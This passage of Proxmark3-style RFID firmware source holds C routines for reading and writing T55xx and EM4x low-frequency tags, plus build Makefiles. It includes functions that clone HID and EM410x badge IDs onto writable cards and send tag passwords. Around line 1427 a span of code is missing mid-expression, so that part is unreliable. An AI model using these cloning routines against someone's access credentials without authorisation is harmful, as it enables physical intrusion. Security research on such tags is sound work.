%d",dest[idx+45],dest[idx+46],dest[idx+47],dest[idx+48],dest[idx+49],dest[idx+50],dest[idx+51],dest[idx+52],dest[idx+53]); 1166 | Dbprintf("%d%d%d%d%d%d%d%d %d%d",dest[idx+54],dest[idx+55],dest[idx+56],dest[idx+57],dest[idx+58],dest[idx+59],dest[idx+60],dest[idx+61],dest[idx+62],dest[idx+63]); 1167 | } 1168 | code = bytebits_to_byte(dest+idx,32); 1169 | code2 = bytebits_to_byte(dest+idx+32,32); 1170 | version = bytebits_to_byte(dest+idx+27,8); //14,4 1171 | facilitycode = bytebits_to_byte(dest+idx+18,8); 1172 | number = (bytebits_to_byte(dest+idx+36,8)<<8)|(bytebits_to_byte(dest+idx+45,8)); //36,9 1173 | 1174 | Dbprintf("XSF(%02d)%02x:%05d (%08x%08x)",version,facilitycode,number,code,code2); 1175 | // if we're only looking for one tag 1176 | if (findone){ 1177 | if (ledcontrol) LED_A_OFF(); 1178 | //LED_A_OFF(); 1179 | *high=code; 1180 | *low=code2; 1181 | return; 1182 | } 1183 | code=code2=0; 1184 | version=facilitycode=0; 1185 | number=0; 1186 | idx=0; 1187 | 1188 | WDT_HIT(); 1189 | } 1190 | DbpString("Stopped"); 1191 | if (ledcontrol) LED_A_OFF(); 1192 | } 1193 | 1194 | /*------------------------------ 1195 | * T5555/T5557/T5567/T5577 routines 1196 | *------------------------------ 1197 | * NOTE: T55x7/T5555 configuration register definitions moved to protocols.h 1198 | * 1199 | * Relevant communication times in microsecond 1200 | * To compensate antenna falling times shorten the write times 1201 | * and enlarge the gap ones. 1202 | * Q5 tags seems to have issues when these values changes. 1203 | */ 1204 | #define START_GAP 31*8 // was 250 // SPEC: 1*8 to 50*8 - typ 15*8 (or 15fc) 1205 | #define WRITE_GAP 20*8 // was 160 // SPEC: 1*8 to 20*8 - typ 10*8 (or 10fc) 1206 | #define WRITE_0 18*8 // was 144 // SPEC: 16*8 to 32*8 - typ 24*8 (or 24fc) 1207 | #define WRITE_1 50*8 // was 400 // SPEC: 48*8 to 64*8 - typ 56*8 (or 56fc) 432 for T55x7; 448 for E5550 1208 | #define READ_GAP 15*8 1209 | 1210 | void TurnReadLFOn(int delay) { 1211 | FpgaWriteConfWord(FPGA_MAJOR_MODE_LF_ADC | FPGA_LF_ADC_READER_FIELD); 1212 | // Give it a bit of time for the resonant antenna to settle. 1213 | SpinDelayUs(delay); //155*8 //50*8 1214 | } 1215 | 1216 | // Write one bit to card 1217 | void T55xxWriteBit(int bit) { 1218 | if (!bit) 1219 | TurnReadLFOn(WRITE_0); 1220 | else 1221 | TurnReadLFOn(WRITE_1); 1222 | FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); 1223 | SpinDelayUs(WRITE_GAP); 1224 | } 1225 | 1226 | // Send T5577 reset command then read stream (see if we can identify the start of the stream) 1227 | void T55xxResetRead(void) { 1228 | LED_A_ON(); 1229 | //clear buffer now so it does not interfere with timing later 1230 | BigBuf_Clear_keep_EM(); 1231 | 1232 | // Set up FPGA, 125kHz 1233 | LFSetupFPGAForADC(95, true); 1234 | 1235 | // Trigger T55x7 in mode. 1236 | FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); 1237 | SpinDelayUs(START_GAP); 1238 | 1239 | // reset tag - op code 00 1240 | T55xxWriteBit(0); 1241 | T55xxWriteBit(0); 1242 | 1243 | // Turn field on to read the response 1244 | TurnReadLFOn(READ_GAP); 1245 | 1246 | // Acquisition 1247 | doT55x7Acquisition(BigBuf_max_traceLen()); 1248 | 1249 | // Turn the field off 1250 | FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); // field off 1251 | cmd_send(CMD_ACK,0,0,0,0,0); 1252 | LED_A_OFF(); 1253 | } 1254 | 1255 | // Write one card block in page 0, no lock 1256 | void T55xxWriteBlockExt(uint32_t Data, uint32_t Block, uint32_t Pwd, uint8_t arg) { 1257 | LED_A_ON(); 1258 | bool PwdMode = arg & 0x1; 1259 | uint8_t Page = (arg & 0x2)>>1; 1260 | uint32_t i = 0; 1261 | 1262 | // Set up FPGA, 125kHz 1263 | LFSetupFPGAForADC(95, true); 1264 | 1265 | // Trigger T55x7 in mode. 1266 | FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); 1267 | SpinDelayUs(START_GAP); 1268 | 1269 | // Opcode 10 1270 | T55xxWriteBit(1); 1271 | T55xxWriteBit(Page); //Page 0 1272 | if (PwdMode){ 1273 | // Send Pwd 1274 | for (i = 0x80000000; i != 0; i >>= 1) 1275 | T55xxWriteBit(Pwd & i); 1276 | } 1277 | // Send Lock bit 1278 | T55xxWriteBit(0); 1279 | 1280 | // Send Data 1281 | for (i = 0x80000000; i != 0; i >>= 1) 1282 | T55xxWriteBit(Data & i); 1283 | 1284 | // Send Block number 1285 | for (i = 0x04; i != 0; i >>= 1) 1286 | T55xxWriteBit(Block & i); 1287 | 1288 | // Perform write (nominal is 5.6 ms for T55x7 and 18ms for E5550, 1289 | // so wait a little more) 1290 | TurnReadLFOn(20 * 1000); 1291 | //could attempt to do a read to confirm write took 1292 | // as the tag should repeat back the new block 1293 | // until it is reset, but to confirm it we would 1294 | // need to know the current block 0 config mode 1295 | 1296 | // turn field off 1297 | FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); 1298 | LED_A_OFF(); 1299 | } 1300 | 1301 | // Write one card block in page 0, no lock 1302 | void T55xxWriteBlock(uint32_t Data, uint32_t Block, uint32_t Pwd, uint8_t arg) { 1303 | T55xxWriteBlockExt(Data, Block, Pwd, arg); 1304 | cmd_send(CMD_ACK,0,0,0,0,0); 1305 | } 1306 | 1307 | // Read one card block in page [page] 1308 | void T55xxReadBlock(uint16_t arg0, uint8_t Block, uint32_t Pwd) { 1309 | LED_A_ON(); 1310 | bool PwdMode = arg0 & 0x1; 1311 | uint8_t Page = (arg0 & 0x2) >> 1; 1312 | uint32_t i = 0; 1313 | bool RegReadMode = (Block == 0xFF); 1314 | 1315 | //clear buffer now so it does not interfere with timing later 1316 | BigBuf_Clear_ext(false); 1317 | 1318 | //make sure block is at max 7 1319 | Block &= 0x7; 1320 | 1321 | // Set up FPGA, 125kHz to power up the tag 1322 | LFSetupFPGAForADC(95, true); 1323 | 1324 | // Trigger T55x7 Direct Access Mode with start gap 1325 | FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); 1326 | SpinDelayUs(START_GAP); 1327 | 1328 | // Opcode 1[page] 1329 | T55xxWriteBit(1); 1330 | T55xxWriteBit(Page); //Page 0 1331 | 1332 | if (PwdMode){ 1333 | // Send Pwd 1334 | for (i = 0x80000000; i != 0; i >>= 1) 1335 | T55xxWriteBit(Pwd & i); 1336 | } 1337 | // Send a zero bit separation 1338 | T55xxWriteBit(0); 1339 | 1340 | // Send Block number (if direct access mode) 1341 | if (!RegReadMode) 1342 | for (i = 0x04; i != 0; i >>= 1) 1343 | T55xxWriteBit(Block & i); 1344 | 1345 | // Turn field on to read the response 1346 | TurnReadLFOn(READ_GAP); 1347 | 1348 | // Acquisition 1349 | doT55x7Acquisition(12000); 1350 | 1351 | // Turn the field off 1352 | FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); // field off 1353 | cmd_send(CMD_ACK,0,0,0,0,0); 1354 | LED_A_OFF(); 1355 | } 1356 | 1357 | void T55xxWakeUp(uint32_t Pwd){ 1358 | LED_B_ON(); 1359 | uint32_t i = 0; 1360 | 1361 | // Set up FPGA, 125kHz 1362 | LFSetupFPGAForADC(95, true); 1363 | 1364 | // Trigger T55x7 Direct Access Mode 1365 | FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); 1366 | SpinDelayUs(START_GAP); 1367 | 1368 | // Opcode 10 1369 | T55xxWriteBit(1); 1370 | T55xxWriteBit(0); //Page 0 1371 | 1372 | // Send Pwd 1373 | for (i = 0x80000000; i != 0; i >>= 1) 1374 | T55xxWriteBit(Pwd & i); 1375 | 1376 | // Turn and leave field on to let the begin repeating transmission 1377 | TurnReadLFOn(20*1000); 1378 | } 1379 | 1380 | /*-------------- Cloning routines -----------*/ 1381 | 1382 | void WriteT55xx(uint32_t *blockdata, uint8_t startblock, uint8_t numblocks) { 1383 | // write last block first and config block last (if included) 1384 | for (uint8_t i = numblocks+startblock; i > startblock; i--) { 1385 | T55xxWriteBlockExt(blockdata[i-1],i-1,0,0); 1386 | } 1387 | } 1388 | 1389 | // Copy HID id to card and setup block 0 config 1390 | void CopyHIDtoT55x7(uint32_t hi2, uint32_t hi, uint32_t lo, uint8_t longFMT) { 1391 | uint32_t data[] = {0,0,0,0,0,0,0}; 1392 | uint8_t last_block = 0; 1393 | 1394 | if (longFMT) { 1395 | // Ensure no more than 84 bits supplied 1396 | if (hi2>0xFFFFF) { 1397 | DbpString("Tags can only have 84 bits."); 1398 | return; 1399 | } 1400 | // Build the 6 data blocks for supplied 84bit ID 1401 | last_block = 6; 1402 | // load preamble (1D) & long format identifier (9E manchester encoded) 1403 | data[1] = 0x1D96A900 | (manchesterEncode2Bytes((hi2 >> 16) & 0xF) & 0xFF); 1404 | // load raw id from hi2, hi, lo to data blocks (manchester encoded) 1405 | data[2] = manchesterEncode2Bytes(hi2 & 0xFFFF); 1406 | data[3] = manchesterEncode2Bytes(hi >> 16); 1407 | data[4] = manchesterEncode2Bytes(hi & 0xFFFF); 1408 | data[5] = manchesterEncode2Bytes(lo >> 16); 1409 | data[6] = manchesterEncode2Bytes(lo & 0xFFFF); 1410 | } else { 1411 | // Ensure no more than 44 bits supplied 1412 | if (hi>0xFFF) { 1413 | DbpString("Tags can only have 44 bits."); 1414 | return; 1415 | } 1416 | // Build the 3 data blocks for supplied 44bit ID 1417 | last_block = 3; 1418 | // load preamble 1419 | data[1] = 0x1D000000 | (manchesterEncode2Bytes(hi) & 0xFFFFFF); 1420 | data[2] = manchesterEncode2Bytes(lo >> 16); 1421 | data[3] = manchesterEncode2Bytes(lo & 0xFFFF); 1422 | } 1423 | // load chip config block 1424 | data[0] = T55x7_BITRATE_RF_50 | T55x7_MODULATION_FSK2a | last_block << T55x7_MAXBLOCK_SHIFT; 1425 | 1426 | //TODO add selection of chip for Q5 or T55x7 1427 | // data[0] = (((50-2)/2)<>= 1; 1508 | } else { 1509 | rev_id = (rev_id << 1) | (id_hi & 1); 1510 | id_hi >>= 1; 1511 | } 1512 | } 1513 | 1514 | for (i = 0; i < EM410X_ID_LENGTH; ++i) { 1515 | id_bit = rev_id & 1; 1516 | 1517 | if (i % 4 == 0) { 1518 | // Don't write row parity bit at start of parsing 1519 | if (i) 1520 | id = (id << 1) | r_parity; 1521 | // Start counting parity for new row 1522 | r_parity = id_bit; 1523 | } else { 1524 | // Count row parity 1525 | r_parity ^= id_bit; 1526 | } 1527 | 1528 | // First elements in column? 1529 | if (i < 4) 1530 | // Fill out first elements 1531 | c_parity[i] = id_bit; 1532 | else 1533 | // Count column parity 1534 | c_parity[i % 4] ^= id_bit; 1535 | 1536 | // Insert ID bit 1537 | id = (id << 1) | id_bit; 1538 | rev_id >>= 1; 1539 | } 1540 | 1541 | // Insert parity bit of last row 1542 | id = (id << 1) | r_parity; 1543 | 1544 | // Fill out column parity at the end of tag 1545 | for (i = 0; i < 4; ++i) 1546 | id = (id << 1) | c_parity[i]; 1547 | 1548 | // Add stop bit 1549 | id <<= 1; 1550 | 1551 | Dbprintf("Started writing %s tag ...", card ? "T55x7":"T5555"); 1552 | LED_D_ON(); 1553 | 1554 | // Write EM410x ID 1555 | uint32_t data[] = {0, (uint32_t)(id>>32), (uint32_t)(id & 0xFFFFFFFF)}; 1556 | 1557 | clock = (card & 0xFF00) >> 8; 1558 | clock = (clock == 0) ? 64 : clock; 1559 | Dbprintf("Clock rate: %d", clock); 1560 | if (card & 0xFF) { //t55x7 1561 | clock = GetT55xxClockBit(clock); 1562 | if (clock == 0) { 1563 | Dbprintf("Invalid clock rate: %d", clock); 1564 | return; 1565 | } 1566 | data[0] = clock | T55x7_MODULATION_MANCHESTER | (2 << T55x7_MAXBLOCK_SHIFT); 1567 | } else { //t5555 (Q5) 1568 | clock = (clock-2)>>1; //n = (RF-2)/2 1569 | data[0] = (clock << T5555_BITRATE_SHIFT) | T5555_MODULATION_MANCHESTER | (2 << T5555_MAXBLOCK_SHIFT); 1570 | } 1571 | 1572 | WriteT55xx(data, 0, 3); 1573 | 1574 | LED_D_OFF(); 1575 | Dbprintf("Tag %s written with 0x%08x%08x\n", card ? "T55x7":"T5555", 1576 | (uint32_t)(id >> 32), (uint32_t)id); 1577 | } 1578 | 1579 | //----------------------------------- 1580 | // EM4469 / EM4305 routines 1581 | //----------------------------------- 1582 | #define FWD_CMD_LOGIN 0xC //including the even parity, binary mirrored 1583 | #define FWD_CMD_WRITE 0xA 1584 | #define FWD_CMD_READ 0x9 1585 | #define FWD_CMD_DISABLE 0x5 1586 | 1587 | uint8_t forwardLink_data[64]; //array of forwarded bits 1588 | uint8_t * forward_ptr; //ptr for forward message preparation 1589 | uint8_t fwd_bit_sz; //forwardlink bit counter 1590 | uint8_t * fwd_write_ptr; //forwardlink bit pointer 1591 | 1592 | //==================================================================== 1593 | // prepares command bits 1594 | // see EM4469 spec 1595 | //==================================================================== 1596 | //-------------------------------------------------------------------- 1597 | // VALUES TAKEN FROM EM4x function: SendForward 1598 | // START_GAP = 440; (55*8) cycles at 125Khz (8us = 1cycle) 1599 | // WRITE_GAP = 128; (16*8) 1600 | // WRITE_1 = 256 32*8; (32*8) 1601 | 1602 | // These timings work for 4469/4269/4305 (with the 55*8 above) 1603 | // WRITE_0 = 23*8 , 9*8 SpinDelayUs(23*8); 1604 | 1605 | uint8_t Prepare_Cmd( uint8_t cmd ) { 1606 | 1607 | *forward_ptr++ = 0; //start bit 1608 | *forward_ptr++ = 0; //second pause for 4050 code 1609 | 1610 | *forward_ptr++ = cmd; 1611 | cmd >>= 1; 1612 | *forward_ptr++ = cmd; 1613 | cmd >>= 1; 1614 | *forward_ptr++ = cmd; 1615 | cmd >>= 1; 1616 | *forward_ptr++ = cmd; 1617 | 1618 | return 6; //return number of emited bits 1619 | } 1620 | 1621 | //==================================================================== 1622 | // prepares address bits 1623 | // see EM4469 spec 1624 | //==================================================================== 1625 | uint8_t Prepare_Addr( uint8_t addr ) { 1626 | 1627 | register uint8_t line_parity; 1628 | 1629 | uint8_t i; 1630 | line_parity = 0; 1631 | for(i=0;i<6;i++) { 1632 | *forward_ptr++ = addr; 1633 | line_parity ^= addr; 1634 | addr >>= 1; 1635 | } 1636 | 1637 | *forward_ptr++ = (line_parity & 1); 1638 | 1639 | return 7; //return number of emited bits 1640 | } 1641 | 1642 | //==================================================================== 1643 | // prepares data bits intreleaved with parity bits 1644 | // see EM4469 spec 1645 | //==================================================================== 1646 | uint8_t Prepare_Data( uint16_t data_low, uint16_t data_hi) { 1647 | 1648 | register uint8_t line_parity; 1649 | register uint8_t column_parity; 1650 | register uint8_t i, j; 1651 | register uint16_t data; 1652 | 1653 | data = data_low; 1654 | column_parity = 0; 1655 | 1656 | for(i=0; i<4; i++) { 1657 | line_parity = 0; 1658 | for(j=0; j<8; j++) { 1659 | line_parity ^= data; 1660 | column_parity ^= (data & 1) << j; 1661 | *forward_ptr++ = data; 1662 | data >>= 1; 1663 | } 1664 | *forward_ptr++ = line_parity; 1665 | if(i == 1) 1666 | data = data_hi; 1667 | } 1668 | 1669 | for(j=0; j<8; j++) { 1670 | *forward_ptr++ = column_parity; 1671 | column_parity >>= 1; 1672 | } 1673 | *forward_ptr = 0; 1674 | 1675 | return 45; //return number of emited bits 1676 | } 1677 | 1678 | //==================================================================== 1679 | // Forward Link send function 1680 | // Requires: forwarLink_data filled with valid bits (1 bit per byte) 1681 | // fwd_bit_count set with number of bits to be sent 1682 | //==================================================================== 1683 | void SendForward(uint8_t fwd_bit_count) { 1684 | 1685 | fwd_write_ptr = forwardLink_data; 1686 | fwd_bit_sz = fwd_bit_count; 1687 | 1688 | LED_D_ON(); 1689 | 1690 | // Set up FPGA, 125kHz 1691 | LFSetupFPGAForADC(95, true); 1692 | 1693 | // force 1st mod pulse (start gap must be longer for 4305) 1694 | fwd_bit_sz--; //prepare next bit modulation 1695 | fwd_write_ptr++; 1696 | FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); // field off 1697 | SpinDelayUs(55*8); //55 cycles off (8us each)for 4305 1698 | FpgaWriteConfWord(FPGA_MAJOR_MODE_LF_ADC | FPGA_LF_ADC_READER_FIELD);//field on 1699 | SpinDelayUs(16*8); //16 cycles on (8us each) 1700 | 1701 | // now start writting 1702 | while(fwd_bit_sz-- > 0) { //prepare next bit modulation 1703 | if(((*fwd_write_ptr++) & 1) == 1) 1704 | SpinDelayUs(32*8); //32 cycles at 125Khz (8us each) 1705 | else { 1706 | //These timings work for 4469/4269/4305 (with the 55*8 above) 1707 | FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); // field off 1708 | SpinDelayUs(23*8); //16-4 cycles off (8us each) 1709 | FpgaWriteConfWord(FPGA_MAJOR_MODE_LF_ADC | FPGA_LF_ADC_READER_FIELD);//field on 1710 | SpinDelayUs(9*8); //16 cycles on (8us each) 1711 | } 1712 | } 1713 | } 1714 | 1715 | void EM4xLogin(uint32_t Password) { 1716 | 1717 | uint8_t fwd_bit_count; 1718 | 1719 | forward_ptr = forwardLink_data; 1720 | fwd_bit_count = Prepare_Cmd( FWD_CMD_LOGIN ); 1721 | fwd_bit_count += Prepare_Data( Password&0xFFFF, Password>>16 ); 1722 | 1723 | SendForward(fwd_bit_count); 1724 | 1725 | //Wait for command to complete 1726 | SpinDelay(20); 1727 | } 1728 | 1729 | void EM4xReadWord(uint8_t Address, uint32_t Pwd, uint8_t PwdMode) { 1730 | 1731 | uint8_t fwd_bit_count; 1732 | uint8_t *dest = BigBuf_get_addr(); 1733 | uint16_t bufferlength = BigBuf_max_traceLen(); 1734 | uint32_t i = 0; 1735 | 1736 | // Clear destination buffer before sending the command 1737 | BigBuf_Clear_ext(false); 1738 | 1739 | //If password mode do login 1740 | if (PwdMode == 1) EM4xLogin(Pwd); 1741 | 1742 | forward_ptr = forwardLink_data; 1743 | fwd_bit_count = Prepare_Cmd( FWD_CMD_READ ); 1744 | fwd_bit_count += Prepare_Addr( Address ); 1745 | 1746 | // Connect the A/D to the peak-detected low-frequency path. 1747 | SetAdcMuxFor(GPIO_MUXSEL_LOPKD); 1748 | // Now set up the SSC to get the ADC samples that are now streaming at us. 1749 | FpgaSetupSsc(); 1750 | 1751 | SendForward(fwd_bit_count); 1752 | 1753 | // Now do the acquisition 1754 | i = 0; 1755 | for(;;) { 1756 | if (AT91C_BASE_SSC->SSC_SR & AT91C_SSC_TXRDY) { 1757 | AT91C_BASE_SSC->SSC_THR = 0x43; 1758 | } 1759 | if (AT91C_BASE_SSC->SSC_SR & AT91C_SSC_RXRDY) { 1760 | dest[i] = (uint8_t)AT91C_BASE_SSC->SSC_RHR; 1761 | i++; 1762 | if (i >= bufferlength) break; 1763 | } 1764 | } 1765 | FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); // field off 1766 | cmd_send(CMD_ACK,0,0,0,0,0); 1767 | LED_D_OFF(); 1768 | } 1769 | 1770 | void EM4xWriteWord(uint32_t Data, uint8_t Address, uint32_t Pwd, uint8_t PwdMode) { 1771 | 1772 | uint8_t fwd_bit_count; 1773 | 1774 | //If password mode do login 1775 | if (PwdMode == 1) EM4xLogin(Pwd); 1776 | 1777 | forward_ptr = forwardLink_data; 1778 | fwd_bit_count = Prepare_Cmd( FWD_CMD_WRITE ); 1779 | fwd_bit_count += Prepare_Addr( Address ); 1780 | fwd_bit_count += Prepare_Data( Data&0xFFFF, Data>>16 ); 1781 | 1782 | SendForward(fwd_bit_count); 1783 | 1784 | //Wait for write to complete 1785 | SpinDelay(20); 1786 | FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); // field off 1787 | LED_D_OFF(); 1788 | } 1789 | -------------------------------------------------------------------------------- /Updated Firmware and CDC Bootloader/patch/files from diff/orig/common/Makefile.common: -------------------------------------------------------------------------------- 1 | #----------------------------------------------------------------------------- 2 | # This code is licensed to you under the terms of the GNU GPL, version 2 or, 3 | # at your option, any later version. See the LICENSE.txt file for the text of 4 | # the license. 5 | #----------------------------------------------------------------------------- 6 | # Common makefile functions for all platforms 7 | #----------------------------------------------------------------------------- 8 | 9 | # This new makefile replaces the previous Makefile/Makefile.linux 10 | # with as much common code for both environments as possible. 11 | # Following is a short OS detection to set up variables, all the 12 | # remaining Makefile should be portable and only depend on these 13 | # variables 14 | # 15 | 16 | # Make sure that all is the default target 17 | # (The including Makefile still needs to define what 'all' is) 18 | 19 | platform = $(shell uname) 20 | 21 | all: 22 | 23 | CROSS ?= arm-none-eabi- 24 | CC = $(CROSS)gcc 25 | AS = $(CROSS)as 26 | LD = $(CROSS)ld 27 | OBJCOPY = $(CROSS)objcopy 28 | GZIP=gzip 29 | 30 | OBJDIR = obj 31 | 32 | INCLUDE = -I../include -I../common 33 | 34 | TAR=tar 35 | TARFLAGS = -C .. -rvf 36 | 37 | # Windows' echo echos its input verbatim, on Posix there is some 38 | # amount of shell command line parsing going on. echo "" on 39 | # Windows yields literal "", on Linux yields an empty line 40 | ifeq ($(shell echo ""),) 41 | 42 | # This is probably a proper system, so we can use uname 43 | UNAME := $(shell uname) 44 | DELETE=rm -rf 45 | MOVE=mv 46 | COPY=cp 47 | PATHSEP=/ 48 | FLASH_TOOL=client/flasher 49 | DETECTED_OS=$(UNAME) 50 | 51 | else 52 | 53 | # Assume that we are running on Windows. 54 | DELETE=del /q 55 | MOVE=ren 56 | COPY=copy 57 | PATHSEP=\\# 58 | #FLASH_TOOL=winsrc\\prox.exe 59 | FLASH_TOOL=winsrc\\flash.exe 60 | DETECTED_OS=Windows 61 | 62 | endif 63 | 64 | 65 | # Also search prerequisites in the common directory (for usb.c), the fpga directory (for fpga.bit), and the zlib directory 66 | VPATH = . ../common ../fpga ../zlib 67 | 68 | INCLUDES = ../include/proxmark3.h ../include/at91sam7s512.h ../include/config_gpio.h ../include/usb_cmd.h $(APP_INCLUDES) 69 | 70 | CFLAGS = -c $(INCLUDE) -Wall -pedantic -std=c99 -Os $(APP_CFLAGS) 71 | LDFLAGS = -nostartfiles -nodefaultlibs -Wl,-gc-sections -n 72 | 73 | LIBS = -lgcc 74 | 75 | THUMBOBJ = $(patsubst %.c,$(OBJDIR)/%.o,$(notdir $(THUMBSRC))) 76 | ARMOBJ = $(patsubst %.c,$(OBJDIR)/%.o,$(notdir $(ARMSRC))) 77 | ASMOBJ = $(patsubst %.s,$(OBJDIR)/%.o,$(notdir $(ASMSRC))) 78 | VERSIONOBJ = $(OBJDIR)/version.o 79 | 80 | $(THUMBOBJ): $(OBJDIR)/%.o: %.c $(INCLUDES) 81 | $(CC) $(CFLAGS) -mthumb -mthumb-interwork -o $@ $< 82 | 83 | $(ARMOBJ): $(OBJDIR)/%.o: %.c $(INCLUDES) 84 | $(CC) $(CFLAGS) -mthumb-interwork -o $@ $< 85 | 86 | $(ASMOBJ): $(OBJDIR)/%.o: %.s 87 | $(CC) $(CFLAGS) -mthumb-interwork -o $@ $< 88 | 89 | $(VERSIONOBJ): $(OBJDIR)/%.o: %.c $(INCLUDES) 90 | $(CC) $(CFLAGS) -mthumb -mthumb-interwork -o $@ $< 91 | 92 | # This objcopy call translates physical flash addresses to logical addresses 93 | # without touching start address or RAM addresses (.bss and .data sections) 94 | # See ldscript.common. -- Henryk Plötz 2009-08-27 95 | OBJCOPY_TRANSLATIONS = --no-change-warnings \ 96 | --change-addresses -0x100000 --change-start 0 \ 97 | --change-section-address .bss+0 --change-section-address .data+0 \ 98 | --change-section-address .commonarea+0 99 | $(OBJDIR)/%.s19: $(OBJDIR)/%.elf 100 | $(OBJCOPY) -Osrec --srec-forceS3 --strip-debug $(OBJCOPY_TRANSLATIONS) $^ $@ 101 | 102 | # version.c should be remade on every compilation 103 | .PHONY: version.c 104 | version.c: default_version.c 105 | perl ../tools/mkversion.pl .. > $@ || $(COPY) $^ $@ 106 | 107 | # Automatic dependency generation 108 | DEPENDENCY_FILES = $(patsubst %.c,$(OBJDIR)/%.d,$(notdir $(THUMBSRC))) \ 109 | $(patsubst %.c,$(OBJDIR)/%.d,$(notdir $(ARMSRC))) \ 110 | $(patsubst %.s,$(OBJDIR)/%.d,$(notdir $(ASMSRC))) 111 | 112 | $(DEPENDENCY_FILES): Makefile ../common/Makefile.common 113 | 114 | $(patsubst %.o,%.d,$(THUMBOBJ) $(ARMOBJ)): $(OBJDIR)/%.d: %.c 115 | @$(CC) -MM -MT "$(@) $(@:.d=.o)" $(CFLAGS) $< > $@ 116 | $(patsubst %.o,%.d,$(ASMOBJ)):$(OBJDIR)/%.d: %.s 117 | @$(CC) -MM -MT "$(@) $(@:.d=.o)" $(CFLAGS) $< > $@ 118 | 119 | -include $(DEPENDENCY_FILES) 120 | -------------------------------------------------------------------------------- /Updated Firmware and CDC Bootloader/patch/files from diff/patch/armsrc/Makefile: -------------------------------------------------------------------------------- 1 | #----------------------------------------------------------------------------- 2 | # This code is licensed to you under the terms of the GNU GPL, version 2 or, 3 | # at your option, any later version. See the LICENSE.txt file for the text of 4 | # the license. 5 | #----------------------------------------------------------------------------- 6 | # Makefile for armsrc, see ../common/Makefile.common for common settings 7 | #----------------------------------------------------------------------------- 8 | 9 | APP_INCLUDES = apps.h 10 | 11 | #remove one of the following defines and comment out the relevant line 12 | #in the next section to remove that particular feature from compilation 13 | APP_CFLAGS = -DWITH_LF -DWITH_ISO15693 -DWITH_ISO14443a -DWITH_ISO14443b -DWITH_ICLASS -DWITH_LEGICRF -DWITH_HITAG -DWITH_CRC -DON_DEVICE -DWITH_HFSNOOP \ 14 | -fno-strict-aliasing -ffunction-sections -fdata-sections 15 | #-DWITH_LCD 16 | 17 | #SRC_LCD = fonts.c LCD.c 18 | SRC_LF = lfops.c hitag2.c hitagS.c lfsampling.c pcf7931.c lfdemod.c protocols.c 19 | SRC_ISO15693 = iso15693.c iso15693tools.c 20 | SRC_ISO14443a = epa.c iso14443a.c mifareutil.c mifarecmd.c mifaresniff.c 21 | SRC_ISO14443b = iso14443b.c 22 | SRC_CRAPTO1 = crapto1.c crypto1.c des.c aes.c 23 | SRC_CRC = iso14443crc.c crc.c crc16.c crc32.c 24 | 25 | #the FPGA bitstream files. Note: order matters! 26 | FPGA_BITSTREAMS = fpga_lf.bit fpga_hf.bit 27 | 28 | #the zlib source files required for decompressing the fpga config at run time 29 | SRC_ZLIB = inflate.c inffast.c inftrees.c adler32.c zutil.c 30 | #additional defines required to compile zlib 31 | ZLIB_CFLAGS = -DZ_SOLO -DZ_PREFIX -DNO_GZIP -DZLIB_PM3_TUNED 32 | APP_CFLAGS += $(ZLIB_CFLAGS) 33 | # zlib includes: 34 | APP_CFLAGS += -I../zlib 35 | 36 | # stdint.h provided locally until GCC 4.5 becomes C99 compliant 37 | APP_CFLAGS += -I. 38 | 39 | # Compile these in thumb mode (small size) 40 | THUMBSRC = start.c \ 41 | $(SRC_LCD) \ 42 | $(SRC_ISO15693) \ 43 | $(SRC_LF) \ 44 | $(SRC_ZLIB) \ 45 | appmain.c \ 46 | printf.c \ 47 | util.c \ 48 | string.c \ 49 | usb_cdc.c \ 50 | cmd.c 51 | 52 | # These are to be compiled in ARM mode 53 | ARMSRC = fpgaloader.c \ 54 | legicrf.c \ 55 | $(SRC_ISO14443a) \ 56 | $(SRC_ISO14443b) \ 57 | $(SRC_CRAPTO1) \ 58 | $(SRC_CRC) \ 59 | legic_prng.c \ 60 | iclass.c \ 61 | BigBuf.c \ 62 | optimized_cipher.c \ 63 | hfsnoop.c 64 | 65 | # Do not move this inclusion before the definition of {THUMB,ASM,ARM}SRC 66 | include ../common/Makefile.common 67 | 68 | OBJS = $(OBJDIR)/fullimage.s19 69 | FPGA_COMPRESSOR = ../client/fpga_compress 70 | 71 | all: $(OBJS) 72 | 73 | .DELETE_ON_ERROR: 74 | 75 | $(OBJDIR)/fpga_all.o: $(OBJDIR)/fpga_all.bit.z 76 | $(OBJCOPY) -O elf32-littlearm -I binary -B arm --prefix-sections=fpga_all_bit $^ $@ 77 | 78 | $(OBJDIR)/fpga_all.bit.z: $(FPGA_BITSTREAMS) $(FPGA_COMPRESSOR) 79 | $(FPGA_COMPRESSOR) $(filter %.bit,$^) $@ 80 | 81 | $(FPGA_COMPRESSOR): 82 | make -C ../client $(notdir $(FPGA_COMPRESSOR)) 83 | 84 | $(OBJDIR)/fullimage.stage1.elf: $(VERSIONOBJ) $(OBJDIR)/fpga_all.o $(THUMBOBJ) $(ARMOBJ) 85 | $(CC) $(LDFLAGS) -Wl,-T,ldscript,-Map,$(patsubst %.elf,%.map,$@) -o $@ $^ $(LIBS) 86 | 87 | $(OBJDIR)/fullimage.nodata.bin: $(OBJDIR)/fullimage.stage1.elf 88 | $(OBJCOPY) -O binary -I elf32-littlearm --remove-section .data $^ $@ 89 | 90 | $(OBJDIR)/fullimage.nodata.o: $(OBJDIR)/fullimage.nodata.bin 91 | $(OBJCOPY) -O elf32-littlearm -I binary -B arm --rename-section .data=stage1_image $^ $@ 92 | 93 | $(OBJDIR)/fullimage.data.bin: $(OBJDIR)/fullimage.stage1.elf 94 | $(OBJCOPY) -O binary -I elf32-littlearm --only-section .data $^ $@ 95 | 96 | $(OBJDIR)/fullimage.data.bin.z: $(OBJDIR)/fullimage.data.bin $(FPGA_COMPRESSOR) 97 | $(FPGA_COMPRESSOR) $(filter %.bin,$^) $@ 98 | 99 | $(OBJDIR)/fullimage.data.o: $(OBJDIR)/fullimage.data.bin.z 100 | $(OBJCOPY) -O elf32-littlearm -I binary -B arm --rename-section .data=compressed_data $^ $@ 101 | 102 | 